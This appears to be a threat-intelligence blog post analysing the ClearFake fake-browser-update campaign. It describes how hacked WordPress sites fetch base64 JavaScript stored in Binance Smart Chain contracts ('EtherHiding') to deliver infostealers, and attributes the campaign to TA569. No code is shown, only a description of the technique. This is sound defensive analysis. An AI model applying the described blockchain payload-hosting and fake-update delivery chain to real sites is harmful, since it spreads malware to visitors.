ClearFake Malware Campaign

Malware With Novel Technique “Ether Hide”

KanakSasak
6 min readSep 19, 2024

Introduction

On August 26, 2023, cybersecurity researcher Randy McEoin shared a report about a new malicious JavaScript framework found on hacked websites, designed to spread malware through drive-by downloads. The malware, named ClearFake, got its name because the early versions had clear text JavaScript code injected into the compromised sites, unlike most JavaScript malware, which is usually hidden or obfuscated.

ClearFake is similar to other “fake updates” scams, like SocGholish and FakeSG, which use social engineering to trick users into installing a fake browser update. By combining this tactic with the watering hole technique, the attackers behind ClearFake target a broad audience, making their malware campaigns more effective and widespread.

Based on our monitoring and customer feedback, we noticed a spike in traffic to ClearFake’s servers in late September 2023. Around the same time, we also found hundreds of websites that had been infected by ClearFake.

In September 2023, Malwarebytes uncovered a campaign involving Atomic Stealer that used fake Google ads to trick macOS users. People searching for the financial charting software, TradingView, were misled into downloading this malware instead.

ClearFake, on the other hand, is a newer operation that uses hacked WordPress sites to show fake browser update messages. The goal is to convince users to download malware like stealers or other harmful programs.

This tactic is similar to what other known groups like TA569 (also called SocGholish), RogueRaticate (FakeSG), ZPHP (SmartApeSG), and EtherHiding have done, all of whom use fake browser updates as a way to spread their malware.

Malware Stage

Here is an overview of the infection chains’ stages observed distributing commodity malware via ClearFake:

ClearFake malware leverages blockchain technology used the EtherHide technique, specifically the Binance Smart Chain, to store and deliver malicious payloads. In this approach, ClearFake embeds obfuscated JavaScript within smart contracts deployed on the blockchain. These smart contracts serve as an immutable, decentralized repository for malware code, making it difficult for traditional security systems to block or detect. The malware retrieves the encoded payload from the blockchain, decodes it using base64, and then executes it, effectively bypassing content filtering and blacklists by utilizing a legitimate blockchain infrastructure

Novel Technique “Ether Hide”

Cybercriminals have come up with a new way to spread malicious code called “EtherHiding,” which involves using Binance’s Smart Chain (BSC) contracts to hide parts of the malicious code within the blockchain. To insert harmful JavaScript into blockchain systems, the attackers used hacked WordPress sites that redirect traffic to Cloudflare Worker hosts, allowing them to distribute the malware more stealthily.

According to Guardio Labs, the attack works by defacing a site with a convincing overlay that urges users to update their browser before they can proceed. However, this “update” actually installs dangerous infostealer malware like RedLine, Amadey, or Lumma.

below is the injected script to victim.

Decoded based64 payload

A breakdown of the technique known as “EtherHiding” was shared by security researchers at Guardio Labs in an Oct. 15 report, explaining that the attack involves compromising WordPress websites by injecting code that retrieves partial payloads from the blockchain contracts.

The attackers hide the payloads in BSC smart contracts, essentially serving as anonymous free hosting platforms for them.

Hackers can easily update their code and change attack methods whenever they want. Recently, they’ve been using fake browser updates to trick victims, where people are led to fake landing pages and links, prompting them to “update” their browsers. The malicious payload includes JavaScript that pulls additional code from the attackers’ servers, eventually leading to complete site defacement with fake browser update notices that deliver malware.

This method lets attackers adjust the attack by swapping out the malicious code with each new blockchain transaction, making it harder to stop, according to Nati Tal, head of cybersecurity at Guardio Labs, and researcher Oleg Zaytsev.Once these infected smart contracts are set up, they run on their own, leaving Binance to rely on its developer community to flag malicious code in contracts when they are found.

We can see this in the transactions history on the BSC, starting on contract creation on the 9th of September 2023 by another attacker-controlled address. That other address, created in late June 2022, was loaded with BNB (The Binance Coin) in an amount just enough to create and update the contract — activities that are not actually payable, yet do cost some minor customary “gas” fees (between 0.02 to 0.60 USD each):

Only the first update of the contract is clearly a test (as it actually included only the string “test”) but all the following are obvious pieces of JavaScript code. When the first entries are quite simple, the latter add more JavaScript obfuscation techniques but keep on doing just the same few simple activities as seen in this first entry (after decoding from Base64):

Once the infected smart contracts are deployed, they operate autonomously. All Binance can do is rely on its developer community to flag malicious code in contracts upon discovery.

Threat Actor

The Diamond Model of Intrusion Analysis is a framework used in cybersecurity to help analysts understand and describe cyber threats. It provides a structured way to analyze intrusions by focusing on four key elements, often referred to as “vertices,” that form the shape of a diamond. These elements are Adversary, Infrastructure, Capability, and Victim.

Based on this diamond model that share by Bridewell the suspected TA is the TA569, who is this threat actor ?

TA569

TA569 is a prolific threat actor primarily known for its deployment of website injections leading to a JavaScript payload known as SocGholish. In the past few months Proofpoint researchers have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the quantity of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages. Such changes, and the frequency of said changes, are likely in response to two things: efficacy data collected during the attack chain and profitability. this threat actor derive by financial background.

--

--